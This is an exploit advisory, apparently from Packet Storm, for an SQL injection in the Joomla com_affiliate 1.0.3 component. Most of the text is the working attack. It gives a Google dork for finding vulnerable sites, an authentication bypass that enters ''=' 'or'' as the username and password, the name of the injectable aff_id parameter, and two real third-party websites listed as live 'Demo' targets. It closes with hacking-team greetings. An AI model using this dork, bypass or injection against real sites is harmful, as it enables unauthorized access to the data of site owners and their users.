Joomla Affiliate 1.0.3 SQL Injection

2016-06-13T00:00:00
ID PACKETSTORM:137449
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2016-06-13T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla com_affiliate - SQL Injection  
# Exploit Author : Persian Hack Team  
# Google Dork : inurl:index.php?option=com_affiliate  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 1.0.3  
# Date: 2016/06/13  
######################  
#  
# PoC:  
# --Bypass Authentication  
# http://www.site.com/index.php?option=com_affiliate&view=login  
# UserName And Password '=' 'or'  
# --SQL Injection  
# http://www.site.com/index.php?aff_id=1  
# aff_id Parameter Vulnerable To SQL   
# Demo :  
# http://www.danieledewinter.com/it/programma-affiliati/login  
# http://www.azarshahd.com/en/index.php?option=com_affiliate&view=login  
#  
# Youtube : https://www.youtube.com/watch?v=bUMjwC5_IYM  
######################  
# Discovered by : Mojtaba MobhaM   
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R & Muhmmad Emad And All Persian Hack Team Members  
# Homepage : persian-team.ir  
######################  
  
  
`